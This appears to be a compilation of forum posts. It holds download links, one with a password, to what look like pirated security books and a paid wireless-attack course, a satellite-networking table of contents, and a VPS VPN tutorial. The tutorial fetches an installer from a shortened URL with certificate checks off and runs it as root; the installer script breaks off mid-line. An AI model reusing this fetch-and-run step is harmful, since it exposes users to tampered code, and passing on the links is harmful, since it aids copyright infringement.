Fi8sVrs

Understanding Network Hacks Attack and Defense with Python Author: Bastian Ballmann Download: http://www.docdroid.net/rfpu/understanding-network-hacks.pdf.html

https://www.sendspace.com/file/x8wed8

SATELLITE NETWORKING PRINCIPLES AND PROTOCOLS SECOND EDITION Author: Zhili Sun University of Surrey, UK Contents List of Figures xix List of Tables xxv About the Author xxvii Preface xxix Acknowledgements xxxi 1 Introduction 1 1.1 Applications and Services of Satellite Networks 1 1.1.1 Roles of Satellite Networks 2 1.1.2 Network Software and Hardware 4 1.1.3 Satellite Network Interfaces 4 1.1.4 Network Services 5 1.1.5 Applications 5 1.2 ITU-R Definitions of Satellite Services 5 1.2.1 Fixed Satellite Service (FSS) 6 1.2.2 Mobile Satellite Service (MSS) 6 1.2.3 Broadcasting Satellite Service (BSS) 6 1.2.4 Other Satellite Services 6 1.3 ITU-T Definitions of Network Services 6 1.3.1 Interactive Services 7 1.3.2 Distribution Services 7 1.4 Internet Services and Applications 8 1.4.1 World Wide Web (WWW) 8 1.4.2 File Transfer Protocol (FTP) 9 1.4.3 Telnet 9 1.4.4 Electronic Mail (email) 10 1.4.5 Multicast and Content Distribution 10 1.4.6 Voice over Internet Protocol (VoIP) 10 1.4.7 Domain Name System (DNS) 11 1.5 Circuit-switching Network 11 1.5.1 Connection Set Up 12 1.5.2 Signalling 13 1.5.3 Transmission Multiplexing Hierarchy based on FDM 13 1.5.4 Transmission Multiplexing Hierarchy based on TDM 13 1.5.5 Space Switching and Time Switching 15 1.5.6 Coding Gain of Forward Error Correction (FEC) 16 1.6 Packet-switching Networks 17 1.6.1 Connection-oriented Approach 18 1.6.2 Connectionless Approach 19 1.6.3 Relationship between Circuit-switching and Packet-switching 20 1.6.4 Considerations of Packet Network Designs 20 1.6.5 Packet Header and Payload 21 1.6.6 Complexity and Heterogeneous Networks 21 1.6.7 Performance of Packet Transmissions 21 1.6.8 Impact of Bit Level Errors on Packet Level 22 1.7 OSI/ISO Reference Model 22 1.7.1 Protocol Terminology 23 1.7.2 Layering Principle 23 1.7.3 Functions of the Seven Layers 23 1.7.4 Fading of the OSI/ISO Reference Model 24 1.8 The ATM Protocol Reference Model 25 1.8.1 Narrowband ISDN (N-ISDN) 25 1.8.2 Broadband ISDN (B-ISDN) 25 1.8.3 ATM Technology 25 1.8.4 Reference Model 26 1.8.5 Problems: Lack of Available Services and Applications 26 1.9 Internet Protocols Reference Model 27 1.9.1 Network Layer: IP Protocol 27 1.9.2 Network Technologies 27 1.9.3 Transport Layer: TCP and UDP 28 1.9.4 Application Layer 28 1.9.5 QoS and Control on Resources 28 1.10 Satellite Network 28 1.10.1 Access Network 29 1.10.2 Transit Network 29 1.10.3 Broadcast Network 29 1.10.4 Space Segment 29 1.10.5 Ground Segment 31 1.10.6 Satellite Orbits 31 1.10.7 Satellite Transmission Frequency Bands 32 1.11 Characteristics of Satellite Networks 34 1.11.1 Propagation Delay 34 1.11.2 Propagation Loss and Power Limited 35 1.11.3 Orbit Space and Bandwidth Limited for Coverage 35 1.11.4 Operational Complexity for LEO 35 1.12 Channel Capacity of Digital Transmissions 35 1.12.1 The Nyquist Formula for Noiseless Channels 36 1.12.2 The Shannon Theorem for Noise Channels 36 1.12.3 Channel Capacity Boundary 36 1.12.4 The Shannon Power Limit (-1.6 dB) 36 1.12.5 Shannon Bandwidth Efficiency for Large Eb/N0 37 1.13 Internetworking with Terrestrial Networks 38 1.13.1 Repeaters at the Physical Layer 38 1.13.2 Bridges at the Link Layer 38 1.13.3 Switches at the Physical, Link and Network Layers 39 1.13.4 Routers for Interconnecting Heterogeneous Networks 39 1.13.5 Protocol Translation, Stacking and Tunnelling 39 1.13.6 Quality of Service (QoS) 40 1.13.7 End-user QoS Class and Requirements 40 1.13.8 Network Performance 41 1.13.9 QoS and NP for Satellite Networking 42 1.14 Digital Video Broadcasting (DVB) 43 1.14.1 The DVB Standards 44 1.14.2 Transmission System 44 1.14.3 Adaptation to Satellite Transponder Characteristics 45 1.14.4 Channel Coding 46 1.14.5 ReedSolomon (RS) Outer Coding, Interleaving and Framing 47 1.14.6 Inner Convolutional Coding 48 1.14.7 Baseband Shaping and Modulation 49 1.14.8 Error Performance Requirements 50 1.15 DVB-S Satellite Delivery 50 1.15.1 MPEG-2 Baseband Processing 51 1.15.2 Transport Stream (TS) 52 1.15.3 Service Objectives 52 1.15.4 Satellite Channel Adaptation 52 1.15.5 DVB Return Channel over Satellite (DVB-RCS) 53 1.15.6 TCP/IP over DVB 54 1.16 DVB Satellite Second Generation (DVB-S2) 54 1.16.1 Technology Novelty in the DVB-S2 55 1.16.2 Transmission System Architecture 56 1.16.3 Error Performance 58 1.17 DVB Satellite Services to Handheld Devices (DVB-SH) 59 1.17.1 Transmission System Architecture 60 1.17.2 Common Functions for both TDM and OFDM Modes 61 1.17.3 Functions for Single Carrier (TDM) Mode 62 1.17.4 Functions for Multi Carrier (OFDM) Mode 65 1.17.5 DVB-RCS2 69 1.18 Historical Development of Computer and Data Networks 69 1.18.1 Dawn of the Computer and Data Communications Age 70 1.18.2 Development of Local Area Networks (LANs) 70 1.18.3 Development of WANs and ISO/OSI 70 1.18.4 Birth of the Internet 70 1.18.5 Integration of Telephony and Data Networks 70 1.18.6 Development of Broadband Integrated Networks 71 1.18.7 The Killer Application WWW and Internet Evolutions 71 1.19 Historical Development of Satellite Communications 71 1.19.1 Start of Satellite and Space Eras 71 1.19.2 Early Satellite Communications: TV and Telephony 72 1.19.3 Development of Satellite Digital Transmission 72 1.19.4 Development of Direct-to-Home (DTH) Broadcast 72 1.19.5 Development of Satellite Maritime Communications 72 1.19.6 Satellite Communications in Regions and Countries 72 1.19.7 Satellite Broadband Networks and Mobile Networks 73 1.19.8 Internet over Satellite Networks 73 1.20 Convergence of Network Technologies and Protocols 73 1.20.1 Convergence of Services and Applications in User Terminals 73 1.20.2 Convergence of Network Technologies 74 1.20.3 Convergence of Network Protocols 75 1.20.4 Satellite Network Evolution 75 Further Readings 77 Exercises 78 2 Satellite Orbits and Networking Concepts 79 2.1 Laws of Physics 80 2.1.1 Keplers Three Laws 80 2.1.2 Newtons Three Laws of Motion and The Universal Law of Gravity 80 2.1.3 Keplers First Law: Satellite Orbits 81 2.1.4 Keplers Second Law: Area Swept by a Satellite Vector 83 2.1.5 Keplers Third Law: Orbit Period 83 2.1.6 Satellite Velocity 84 2.2 Satellite Orbit Parameters 85 2.2.1 Semi-Major Axis (a) 85 2.2.2 Eccentricity (e) 85 2.2.3 Inclination of Orbit (i) 85 2.2.4 Right Ascension of the Node (?) and Argument of Perigee (??) 86 2.3 Useful Orbits 87 2.3.1 Geosynchronous Earth Orbits 87 2.3.2 Geostationary Earth Orbits (GEOs) 87 2.3.3 High Elliptical Orbits (HEOs) 88 2.3.4 Notations of Low Earth Orbit (LEO) Satellite Constellations 88 2.3.5 Orbital Perturbations 89 2.3.6 Satellite Altitude and Coverage 89 2.3.7 Antenna Gain and Beam-width Angle 90 2.3.8 Coverage Calculations 91 2.3.9 Distance and Propagation Delay from Earth Station to Satellite 92 2.4 Satellite Link Characteristics and Modulations for Transmissions 93 2.4.1 Satellite Link Characteristics 93 2.4.2 Modulation Techniques 95 2.4.3 Phase Shift Keying (PSK) Schemes for Satellite Transmissions 96 2.4.4 Binary Phase Shift Keying (BPSK) 96 2.4.5 Quadrature PSK (QPSK) 97 2.4.6 Gaussian-filtered Minimum Shift Keying (GMSK) 97 2.4.7 Bit Error Rate (BER): the Quality Parameter of Modulation Schemes 98 2.4.8 Satellite Networking in the Physical Layer 100 2.5 Forward Error Correction (FEC) 101 2.5.1 Linear Block Codes 101 2.5.2 Cyclic Codes 102 2.5.3 Trellis Coding and Convolutional Codes 102 2.5.4 Concatenated Codes 103 2.5.5 Turbo Codes 103 2.5.6 Performance of FEC 104 2.6 Multiple Access Techniques 105 2.6.1 Frequency Division Multiple Access (FDMA) 106 2.6.2 Time Division Multiple Access (TDMA) 106 2.6.3 Code Division Multiple Access (CDMA) 107 2.6.4 Comparison of FDMA, TDMA and CDMA 108 2.7 Bandwidth Allocation 108 2.7.1 Fixed Assignment Access 109 2.7.2 Demand Assignment 109 2.7.3 Random Access 109 2.8 Satellite Networking Issues 110 2.8.1 Single-hop Satellite Connections 110 2.8.2 Multi-hop Satellite Connections 110 2.8.3 Inter-satellite Links (ISL) 111 2.8.4 Handovers 112 2.8.5 Satellite Intra-beam and Inter-beam Handovers 114 2.8.6 Earth Fixed Coverage versus Satellite Fixed Coverage 114 2.8.7 Routing within a Constellation of Satellite Networks 115 2.8.8 Internetworking 116 2.8.9 Satellite Availability and Diversity 116 Further Readings 118 Exercises 118 3 B-ISDN ATM and Internet Protocols 119 3.1 ATM Protocol and Fundamental Concepts 119 3.1.1 Packetisation Delay 121 3.1.2 Queuing Delay 121 3.1.3 Compromise Solution Between North America and Europe 122 3.2 ATM Layer 123 3.2.1 The GFC Field 123 3.2.2 The VPI and VCI Fields 123 3.2.3 The CLP Field 125 3.2.4 The PT Field 126 3.2.5 The HEC Field 126 3.3 ATM Adaptation Layer (AAL) 126 3.3.1 AAL1 for Class A 127 3.3.2 AAL2 for Class B 129 3.3.3 AAL3/4 for Classes C and D 129 3.3.4 AAL5 for Internet Protocol 130 3.4 The Physical Layer 131 3.4.1 The Physical Medium (PM) Sublayers 131 3.4.2 The Transmission Convergence (TC) Sublayer 131 3.4.3 ATM Cell Transmissions 132 3.5 ATM Interfaces and ATM Networking 134 3.5.1 UserNetwork Access 134 3.5.2 Network Node Interconnections 135 3.5.3 ATM DXI 136 3.5.4 B-ICI 136 3.5.5 Permanent Virtual Connections versus Switched Virtual Connections 136 3.5.6 ATM Signalling 137 3.5.7 ATM Addressing 137 3.5.8 Address Registration 139 3.6 Network Traffic, QoS and Performance Issues 139 3.6.1 Traffic Descriptors 140 3.6.2 QoS Parameters 140 3.6.3 Performance Issues 140 3.7 Network Resource Management 141 3.7.1 Connection Admission Control (CAC) 142 3.7.2 UPC and NPC 142 3.7.3 Priority Control and Congestion Control 142 3.7.4 Traffic Shaping 143 3.7.5 Generic Cell Rate Algorithm (GCRA) 143 3.7.6 Leaky Bucket Algorithm (LBA) 143 3.7.7 Virtual Scheduling Algorithm (VSA) 146 3.8 Internet Protocols 146 3.8.1 Internet Networking Basics 147 3.8.2 Protocol Hierarchies 147 3.8.3 Connectionless Network Layer 148 3.8.4 The IP Packet Format 148 3.8.5 IP Address 150 3.8.6 Mapping Between Internet and Physical Network Addresses 151 3.8.7 ARP, RARP and HDCP 152 3.9 Internet Routing Protocols 152 3.9.1 The Interior Gateway Routing Protocol (IGRP) 152 3.9.2 The Exterior Gateway Routing Protocol (EGRP) 153 3.10 Transport Layer Protocols: TCP and UDP 153 3.10.1 Transmission Control Protocol (TCP) 153 3.10.2 The TCP Segment Header Format 154 3.10.3 Connection Set Up and Data Transmission 155 3.10.4 Congestion and Flow Control 156 3.10.5 User Datagram Protocol (UDP) 157 3.11 IP and ATM Internetworking 158 3.11.1 Packet Encapsulation 159 3.11.2 IP and ATM Address Resolution 160 Further Readings 161 Exercises 161 4 Satellite Internetworking with Terrestrial Networks 163 4.1 Networking Concepts 163 4.2 Networking Terminology 165 4.2.1 Private Network 165 4.2.2 Public Network 165 4.2.3 Quality Aspects of Telephony Services 166 4.2.4 IP Based Network 166 4.3 Network Elements and Connections 167 4.3.1 Network Terminals 167 4.3.2 Network Nodes 168 4.3.3 Network Connections 168 4.3.4 End-to-End Paths 169 4.3.5 Reference Configurations 169 4.4 Network Traffic and Signalling 170 4.4.1 User Traffic and Network Services 170 4.4.2 Signalling Systems and Signalling Traffic 171 4.4.3 In-band Signalling 172 4.4.4 Out-of-Band Signalling 173 4.4.5 Associated and Disassociated Channel Signalling 173 4.4.6 Network Management 174 4.4.7 Network Operation Systems and Mediation Functions 175 4.5 Access and Transit Transmission Networks 176 4.5.1 Analogue Telephony Networks 177 4.5.2 Telephony Network Traffic Engineering Concept 177 4.5.3 Access to Satellite Networks in the Frequency Domain 178 4.5.4 On-Board Circuit Switching 179 4.6 Digital Telephony Networks 180 4.6.1 Digital Multiplexing Hierarchy 180 4.6.2 Satellite Digital Transmission and On-Board Switching 181 4.6.3 Plesiochronous Digital Hierarchy (PDH) 181 4.6.4 Limitations of PDH 181 4.7 Synchronous Digital Hierarchy (SDH) 182 4.7.1 Development of SDH 183 4.7.2 The SDH Standards 183 4.7.3 Mapping from PDH to SDH 184 4.7.4 The Benefits of SDH 185 4.7.5 Synchronous Operation 185 4.7.6 Synchronous Optical Network (SONET) 187 4.7.7 SDH Over Satellite The Intelsat Scenarios 188 4.8 Hypothetical References for Satellite Networks 189 4.8.1 ITU-T Hypothetical Reference Connection (HRX) 189 4.8.2 ITU-R Hypothetical Reference Digital Path (HRDP) for Satellite 190 4.8.3 Performance Objectives 191 4.9 Satellites and MANET 191 4.9.1 Networking Scenarios 193 4.10 Interworking with Heterogeneous Networks 197 4.10.1 Services 197 4.10.2 Addressing 198 4.10.3 Routing 198 4.10.4 Evolution 198 Further Readings 199 Exercises 200 5 B-ISDN ATM over Satellite Networks 201 5.1 Background 201 5.1.1 Networking Issues 202 5.1.2 Satellite Services in the B-ISDN Networking Environment 202 5.2 Design Issues of Satellite B-ISDN ATM Systems 204 5.2.1 Propagation Delay 204 5.2.2 Attenuation and Constraints 205 5.3 The GEO Satellite B-ISDN ATM Networking Architecture 206 5.3.1 Ground Segment 206 5.3.2 Space Segment 207 5.3.3 Satellite Bandwidth Resource Management 207 5.3.4 Connection Admission Control (CAC) 209 5.3.5 Network Policing Functions 209 5.3.6 Reactive Congestion Control 209 5.4 Advanced Satellite B-ISDN ATM Networks 210 5.4.1 Radio Access Layer 210 5.4.2 On-Board Processing (OBP) Characteristics 211 5.4.3 B-ISDN ATM On-Board Switch 211 5.4.4 Multibeam Satellites 214 5.4.5 LEO/MEO Satellite Constellations 215 5.4.6 Inter-Satellite Links (ISL) 215 5.4.7 Mobility Management 216 5.4.8 Use of Higher Frequency Spectrum 216 5.5 B-ISDN ATM Performance 217 5.5.1 Layered Model of Performance for B-ISDN 217 5.5.2 Network Performance Parameters 218 5.5.3 Impact of Satellite Burst Errors on the ATM Layer 220 5.5.4 Impact of Burst Errors on AAL Protocols 221 5.5.5 Error Control Mechanisms 221 5.5.6 Enhancement Techniques for Broadband Satellite Networks 222 5.6 Evolution of Broadband Satellite Systems 224 Further Readings 225 Exercises 225 6 Internet Protocol (IP) over Satellite Networks 227 6.1 Different Viewpoints of Satellite Networking 227 6.1.1 Protocol-centric Viewpoint of Satellite IP Network 228 6.1.2 Satellite-centric Viewpoint of Global Networks and the Internet 229 6.1.3 Network-centric Viewpoint of Satellite Networks 230 6.2 IP Packet Encapsulation 231 6.2.1 Basic Concepts 231 6.2.2 High-level Data Link Control (HDLC) Protocol 232 6.2.3 Point-to-Point Protocol (PPP) 232 6.2.4 Media Access Control 233 6.2.5 IP Over Satellite 233 6.3 Satellite IP Networking 233 6.3.1 Routing On-Board Satellites 235 6.3.2 IP Mobility in Satellite Networks 235 6.3.3 Address Resolution 237 6.4 IP Multicast Over Satellite 237 6.4.1 IP Multicast Concepts 238 6.4.2 IP Multicast Addressing 239 6.4.3 Multicast Group Management 239 6.4.4 IP Multicast Routing 240 6.4.5 IP Multicast Scope 241 6.4.6 IGMP Behaviour in Satellite Environments 241 6.4.7 Multicast Routing Protocols in Satellite Environments 243 6.4.8 Reliable Multicast Protocols Over Satellites 243 6.5 Basic Network Security Mechanisms 245 6.5.1 Security Approaches 245 6.5.2 Single-direction Hashing Functions 246 6.5.3 Symmetrical Codes (With Secret Keys) 246 6.5.4 Asymmetrical Codes (With Public/Private Keys) 247 6.6 Satellite Networking Security 248 6.6.1 IP Security (IPsec) 248 6.6.2 Firewall and VPN 249 6.6.3 IP Multicast Security 250 6.7 Internet Quality of Service (IP QoS) 250 6.7.1 Layered Model of Performance for IP Service 251 6.7.2 IP Packet Transfer Performance Parameters 252 6.7.3 IP Network Performance Objectives for QoS Classes 253 6.7.4 Guidance on IP QoS Class Usage 254 6.8 Integrated Services (Intserv) Architectures for QoS 254 6.8.1 Integrated Services Architecture (ISA) Principles 255 6.8.2 Resource Reservation Protocol (RSVP) 256 6.8.3 Intserv Service Classes 257 6.9 Differentiated Services (Diffserv) for QoS 258 6.9.1 Diffserv Architecture 258 6.9.2 Traffic Classification 260 6.9.3 Traffic Conditioning 261 6.9.4 Diffserv Per Hop Behaviour (PHB) 261 6.9.5 Supporting Intserv Across the Satellite Network Diffserv Domain 263 6.10 DVB Over Satellite 264 6.10.1 MPEG-2 Source Coding and Multiplexing DVB-S Streams 265 6.10.2 DVB-S System 266 6.10.3 DVB Security 268 6.10.4 Conditional Access in DVB-S 268 6.10.5 DVB-RCS Interactive Service and IP over DVB 270 6.10.6 DVB-RCS Security 271 6.10.7 IP Multicast Security 271 6.11 DVB-S and DVB-RCS Network Architecture 272 6.11.1 On-Board Processor (OBP) 273 6.11.2 Management Station (MS) 274 6.11.3 Regenerative Satellite Gateway (RSGW) 274 6.11.4 Return Channel Satellite Terminal (RCST) 275 6.11.5 Network Interface 275 6.11.6 Network System Characteristics 276 6.12 Network Protocol Stack Architecture 276 6.13 The Physical Layer (PHY) 277 6.13.1 Up-link (DVB-RCS Compliant) 277 6.13.2 Time Slots 278 6.13.3 Frames 278 6.13.4 Superframes 280 6.13.5 Carrier Type and Frame Composition 280 6.13.6 Uplink MF-TDMA Channel Frequency Plan 281 6.13.7 Downlink (DVB-S Compliant) 282 6.13.8 RCS Terminal (RCST) Transmission 283 6.14 Satellite MAC (SMAC) Layer 284 6.14.1 Transport Mechanisms 284 6.14.2 MPEG-2, DVB-S and DVB-RCS Tables 285 6.15 Multi Protocol Encapsulation (MPE) 288 6.16 Satellite Link Control Layer 290 6.16.1 Session Control 290 6.16.2 Resource Control 293 6.16.3 Capacity Request Categories 294 6.16.4 Connection Control 294 6.17 Quality of Service (QoS) 297 6.17.1 Traffic Classes 297 6.17.2 Flow Classification 298 6.17.3 Link Layer Connection QoS Adaptation 298 6.18 Network Layer 299 6.18.1 IP Routing and Address Resolution 299 6.18.2 IP Multicast Star and Mesh Configurations 301 Further Readings 303 Exercises 305 7 Impact of Satellite Networks on Transport Layer Protocols 307 7.1 Introduction 308 7.1.1 Application Characteristics 308 7.1.2 Client and Server Host Parameters 309 7.1.3 Satellite Network Configurations 309 7.1.4 TCP and Satellite Channel Characteristics 310 7.1.5 TCP Flow Control, Congestion Control and Error Recovery 311 7.2 TCP Performance Analysis 313 7.2.1 First TCP Segment Transmission 313 7.2.2 TCP Transmission in the Slow-start Stage 314 7.2.3 TCP Transmission in the Congestion Avoidance Stage 314 7.3 Slow-start Enhancement for Satellite Networks 315 7.3.1 TCP for Transactions 316 7.3.2 Slow-start and Delayed Acknowledgement (ACK) 316 7.3.3 Larger Initial Window 317 7.3.4 Terminating Slow-start 317 7.4 Loss Recovery Enhancement 318 7.4.1 Fast Retransmission and Fast Recovery 318 7.4.2 Selective Acknowledgement (SACK) 319 7.4.3 SACK Based Enhancement Mechanisms 319 7.4.4 ACK Congestion Control 320 7.4.5 ACK Filtering 320 7.4.6 Explicit Congestion Notification 321 7.4.7 Detecting Corruption Loss 322 7.4.8 Congestion Avoidance Enhancement Policy 322 7.5 Enhancements for Satellite Networks Using Interruptive Mechanisms 323 7.5.1 TCP Spoofing 323 7.5.2 Cascading TCP or Split TCP 324 7.5.3 Other Considerations for Satellite Networking 325 7.6 Impacts on Applications 325 7.6.1 Bulk Data Transfer 325 7.6.2 Interactive Applications 326 7.6.3 Distributed Caching for Internet Services and Applications 326 7.6.4 Web Caching in Satellite Networks 327 7.7 Real-time Transport Protocol (RTP) 328 7.7.1 Basics of RTP 328 7.7.2 RTP Control Protocol (RTCP) 331 7.7.3 Sender Report (SR) Packets 332 7.7.4 Receiver Report (RR) Packets 333 7.7.5 Source Description (SDES) RTCP Packet 333 7.7.6 SAP and SIP Protocols for Session Initiations 334 7.7.7 Session Directory Service (SDS) 336 7.8 Voice over IP 336 7.8.1 Gateway Decomposition 336 7.8.2 Protocols 336 7.8.3 Gatekeepers 337 7.8.4 Multimedia Conferencing (MMC) 337 7.8.5 Conference Control 337 Further Readings 337 Exercises 338 8 Next Generation Internet (NGI) over Satellite 341 8.1 Introduction 342 8.2 New Services and Applications 342 8.2.1 Internet Integrated Services 343 8.2.2 Elastic and Inelastic Traffic 343 8.2.3 QoS Provision and Network Performance 344 8.3 Traffic Modelling and Characterisation 344 8.3.1 Traffic Engineering Techniques 345 8.3.2 Traffic Modelling 345 8.3.3 Statistical Methods for Traffic Modelling 346 8.3.4 Renewal Models 346 8.3.5 Markov Models 346 8.3.6 Fluid Models 347 8.3.7 Auto-regressive and Moving Average Models 347 8.3.8 Self-similar Models 348 8.4 The Nature of Internet Traffic 348 8.4.1 World Wide Web (WWW) 348 8.4.2 Pareto Distribution Model for Self-similar Traffic 350 8.4.3 Fractional Brownian Motion (FBM) Process 350 8.4.4 Consideration of User Behaviour in Traffic Modelling 351 8.4.5 Voice Traffic Modelling 352 8.4.6 On-off Model for Voice Traffic 354 8.4.7 Video Traffic Modelling 355 8.4.8 Multi-layer Modelling for WWW Traffic 356 8.5 Traffic Engineering 357 8.5.1 Traffic Engineering Principles 358 8.5.2 Internet Traffic Engineering 360 8.6 Multi-protocol Label Switching (MPLS) 361 8.6.1 MPLS Forwarding Paradigm 362 8.6.2 MPLS Basic Operation 363 8.6.3 MPLS and Diffserv Interworking 366 8.6.4 MPLS and ATM Interworking 367 8.6.5 MPLS with Traffic Engineering (MPLS-TE) 368 8.7 Internet Protocol Version 6 (IPv6) 369 8.7.1 Basics of Internet Protocol Version 6 (IPv6) 369 8.7.2 IPv6 Addressing 371 8.7.3 IPv6 Networks over Satellites 374 8.7.4 IPv6 Transitions 375 8.7.5 IPv6 Tunnelling Through Satellite Networks 375 8.7.6 The 6to4 Translation via Satellite Networks 376 8.7.7 Issues with 6to4 377 8.7.8 Future Development of Satellite Networking 378 Further Readings 380 Exercises 381 Index 383 Download: http://www68.zippyshare.com/v/XtssMyns/file.html

The wireless industry continues to grow in leaps and bounds with more and more gadgets evolving to be wireless. Wireless access points, media centers, phones, and even security systems are commonplace in the average household. Unfortunately, the security that is implemented on this equipment is often lacking, opening the devices syto severe security vulnerabilities. In practice, many companies and organizations still use and deploy vulnerable wireless gear, often in their default configurations. This is most often due to poor security awareness or a lack of understanding of the risks and ramifications. Download: https://www.dropbox.com/s/bi60f383g4phbuu/Offensive%20Security%20Wireless%20Attacks%20-%20WiFu%20v3.0.7z?dl=0 pwd: rstforums.com

daca le puneai intr-un fisier .txt sau le cryptai era si mai ok, deoarece parolele se indexeaza in google

There are many ways you can go about creating your own Virtual Private Network. Let’s do the easiest one in this tutorial which will be how to use your VPS as your own VPN for your main machines connection. – ro0ted What’s used in this tutorial? Digital Oceans Cloud Debian Server VPS Putty AIO Open Puttygen>Click Generate>move your mouse around the blank space. Then copy the public key to the clipboard, save the public/private key Go to digital ocean control panel click SSH Keys. Copy n paste the public key from Puttygen to Control Panel. Now open Putty. Now once you are in Auth, In RLogin enter Root. Now you can connect to your server without ever entering a key. Minimize this window go to Create Droplet to make your server. Edit yours how you want just make sure you don’t enable Ipv6. Debian is more stable than all of them. Click SSH Key before clicking create droplet. Then go to droplets left side menu. Copy n paste ip in droplets to your putty. Click open. Should work flawlessly. If it does ask for a pass phrase ex: Passphrase for RSA-Key”” that means you put phrase in puttygen. If it says password for root, you did something wrong. If you can set this VPN Server up through this tutorial then just throw your computer away because this is an Automatic Installation for you. There’s really nothing to explain. This script does everything for you. Is it the safest way? Probably not but the more IMPORTANT question should be who do you trust more with your logs? Once signed in. type: sudo apt-get dist-upgrade sudo apt-get upgrade sudo apt-get update wget http://git.io/vpn –no-check-certificate -O openvpn-install.sh; chmod +x openvpn-install.sh; mirror: #!/bin/bash# OpenVPN road warrior installer for Debian-based distros # This script will only work on Debian-based systems. It isn't bulletproof but # it will probably work if you simply want to setup a VPN on your Debian/Ubuntu # VPS. It has been designed to be as unobtrusive and universal as possible. if [[ "$USER" != 'root' ]]; then echo "Sorry, you need to run this as root" exit fi if [[ ! -e /dev/net/tun ]]; then echo "TUN/TAP is not available" exit fi if [[ ! -e /etc/debian_version ]]; then echo "Looks like you aren't running this installer on a Debian-based system" exit fi newclient () { # Generates the client.ovpn cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/$1.ovpn sed -i "/ca ca.crt/d" ~/$1.ovpn sed -i "/cert client.crt/d" ~/$1.ovpn sed -i "/key client.key/d" ~/$1.ovpn echo "<ca>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/ca.crt >> ~/$1.ovpn echo "</ca>" >> ~/$1.ovpn echo "<cert>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/$1.crt >> ~/$1.ovpn echo "</cert>" >> ~/$1.ovpn echo "<key>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/$1.key >> ~/$1.ovpn echo "</key>" >> ~/$1.ovpn } # Try to get our IP from the system and fallback to the Internet. # I do this to make the script compatible with NATed servers (lowendspirit.com) # and to avoid getting an IPv6. IP=$(ifconfig | grep 'inet addr:' | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -d: -f2 | awk '{ print $1}' | head -1) if [[ "$IP" = "" ]]; then IP=$(wget -qO- ipv4.icanhazip.com) fi if [[ -e /etc/openvpn/server.conf ]]; then while : do clear echo "Looks like OpenVPN is already installed" echo "What do you want to do?" echo "" echo "1) Add a cert for a new user" echo "2) Revoke existing user cert" echo "3) Remove OpenVPN" echo "4) Exit" echo "" read -p "Select an option [1-4]: " option case $option in 1) echo "" echo "Tell me a name for the client cert" echo "Please, use one word only, no special characters" read -p "Client name: " -e -i client CLIENT cd /etc/openvpn/easy-rsa/2.0/ source ./vars # build-key for the client export KEY_CN="$CLIENT" export EASY_RSA="${EASY_RSA:-.}" "$EASY_RSA/pkitool" $CLIENT # Generate the client.ovpn newclient "$CLIENT" echo "" echo "Client $CLIENT added, certs available at ~/$CLIENT.ovpn" exit ;; 2) echo "" echo "Tell me the existing client name" read -p "Client name: " -e -i client CLIENT cd /etc/openvpn/easy-rsa/2.0/ . /etc/openvpn/easy-rsa/2.0/vars . /etc/openvpn/easy-rsa/2.0/revoke-full $CLIENT # If it's the first time revoking a cert, we need to add the crl-verify line if grep -q "crl-verify" "/etc/openvpn/server.conf"; then echo "" echo "Certificate for client $CLIENT revoked" else echo "crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem" >> "/etc/openvpn/server.conf" /etc/init.d/openvpn restart echo "" echo "Certificate for client $CLIENT revoked" fi exit ;; 3) apt-get remove --purge -y openvpn openvpn-blacklist rm -rf /etc/openvpn rm -rf /usr/share/doc/openvpn sed -i '/--dport 53 -j REDIRECT --to-port/d' /etc/rc.local sed -i '/iptables -t nat -A POSTROUTING -s 10.8.0.0/d' /etc/rc.local echo "" echo "OpenVPN removed!" exit ;; 4) exit;; esac done else clear echo 'Welcome to this quick OpenVPN "road warrior" installer' echo "" # OpenVPN setup and first user creation echo "I need to ask you a few questions before starting the setup" echo "You can leave the default options and just press enter if you are ok with them" echo "" echo "First I need to know the IPv4 address of the network interface you want OpenVPN" echo "listening to." read -p "IP address: " -e -i $IP IP echo "" echo "What port do you want for OpenVPN?" read -p "Port: " -e -i 1194 PORT echo "" echo "Do you want OpenVPN to be available at port 53 too?" echo "This can be useful to connect under restrictive networks" read -p "Listen at port 53 [y/n]: " -e -i n ALTPORT echo "" echo "Do you want to enable internal networking for the VPN?" echo "This can allow VPN clients to communicate between them" read -p "Allow internal networking [y/n]: " -e -i n INTERNALNETWORK echo "" echo "What DNS do you want to use with the VPN?" echo " 1) Current system resolvers" echo " 2) OpenDNS" echo " 3) Level 3" echo " 4) NTT" echo " 5) Hurricane Electric" echo " 6) Yandex" read -p "DNS [1-6]: " -e -i 1 DNS echo "" echo "Finally, tell me your name for the client cert" echo "Please, use one word only, no special characters" read -p "Client name: " -e -i client CLIENT echo "" echo "Okay, that was all I needed. We are ready to setup your OpenVPN server now" read -n1 -r -p "Press any key to continue..." apt-get update apt-get install openvpn iptables openssl -y cp -R /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn # easy-rsa isn't available by default for Debian Jessie and newer if [[ ! -d /etc/openvpn/easy-rsa/2.0/ ]]; then wget --no-check-certificate -O ~/easy-rsa.tar.gz https://github.com/OpenVPN/easy-rsa/archive/2.2.2.tar.gz tar xzf ~/easy-rsa.tar.gz -C ~/ mkdir -p /etc/openvpn/easy-rsa/2.0/ cp ~/easy-rsa-2.2.2/easy-rsa/2.0/* /etc/openvpn/easy-rsa/2.0/ rm -rf ~/easy-rsa-2.2.2 rm -rf ~/easy-rsa.tar.gz fi cd /etc/openvpn/easy-rsa/2.0/ # Let's fix one thing first... cp -u -p openssl-1.0.0.cnf openssl.cnf # Fuck you NSA - 1024 bits was the default for Debian Wheezy and older sed -i 's|export KEY_SIZE=1024|export KEY_SIZE=2048|' /etc/openvpn/easy-rsa/2.0/vars # Create the PKI . /etc/openvpn/easy-rsa/2.0/vars . /etc/openvpn/easy-rsa/2.0/clean-all # The following lines are from build-ca. I don't use that script directly # because it's interactive and we don't want that. Yes, this could break # the installation script if build-ca changes in the future. export EASY_RSA="${EASY_RSA:-.}" "$EASY_RSA/pkitool" --initca $* # Same as the last time, we are going to run build-key-server export EASY_RSA="${EASY_RSA:-.}" "$EASY_RSA/pkitool" --server server # Now the client keys. We need to set KEY_CN or the stupid pkitool will cry export KEY_CN="$CLIENT" export EASY_RSA="${EASY_RSA:-.}" 